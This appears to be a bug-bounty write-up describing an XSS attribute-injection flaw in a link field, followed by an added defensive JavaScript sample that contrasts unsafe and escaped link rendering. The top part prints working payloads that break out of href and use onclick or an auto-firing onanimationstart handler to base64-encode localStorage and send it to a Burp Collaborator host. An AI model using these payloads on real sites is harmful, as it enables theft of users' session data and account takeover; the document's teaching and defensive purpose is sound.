How I managed to trigger XSS automatically to get critical account takeover

https://google.com"'/>
Broken HTML
https://google.com"onclick="alert('1')"a="
<a href="https://google.com" onclick="alert(1)" a=""> 
https://google.com"onclick="b=JSON.stringify(localStorage);c=btoa(b);i=new/**/Image;i.src='https://burpcollaborator.burpcollaborator.net?t='+c"a="
REDACTED CSS
https://google.com"onanimationstart="b=JSON.stringify(localStorage);c=btoa(b);i=new/**/Image;i.src='https://burpcollaborator.burpcollaborator.net?t='+c"style="animation-name:Toastify__bounceOutRight
  • I put the malicious JavaScript code in the onanimationstart attribute.
  • In the tag's style, I defined the animation I had found.
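
The payloads above work because a double quote in the submitted URL closes the href attribute, so everything after it is parsed as new attributes on the same tag. The following is an added example, not code from the original post or the affected application: it contrasts that rendering with one that validates the URL and escapes the attribute value. All function names are hypothetical, and the attribute scanner is a simplification for this sample, not an HTML parser.

```javascript
// Vulnerable pattern: the user-supplied URL is concatenated into the markup.
function renderLinkUnsafe(url) {
  return '<a href="' + url + '">link</a>';
}

// Escape every character that can terminate or reshape an attribute value.
function escapeAttr(value) {
  const map = { '&': '&amp;', '"': '&quot;', "'": '&#39;', '<': '&lt;', '>': '&gt;', '`': '&#96;' };
  return String(value).replace(/[&"'<>`]/g, (ch) => map[ch]);
}

// Hardened pattern: parse, allow only http/https, re-serialize, then escape.
function renderLinkSafe(url) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch {
    return '<span>invalid link</span>';
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') {
    return '<span>invalid link</span>';
  }
  return '<a href="' + escapeAttr(parsed.href) + '" rel="noopener noreferrer">link</a>';
}

// Simplified scanner: lists the attribute names a browser would see.
// Like a browser, it does not require whitespace between attributes.
function attributeNames(html) {
  const names = [];
  const re = /([a-zA-Z-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/g;
  let m;
  while ((m = re.exec(html)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Payload shape taken from the article (the alert variant).
const payload = 'https://google.com"onclick="alert(\'1\')"a="';

console.log(attributeNames(renderLinkUnsafe(payload))); // handler attribute is present
console.log(attributeNames(renderLinkSafe(payload)));   // no handler attribute
```

Escaping at output is the fix for the injection itself; a Content-Security-Policy that disallows inline event handlers limits the impact if an escape is ever missed.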
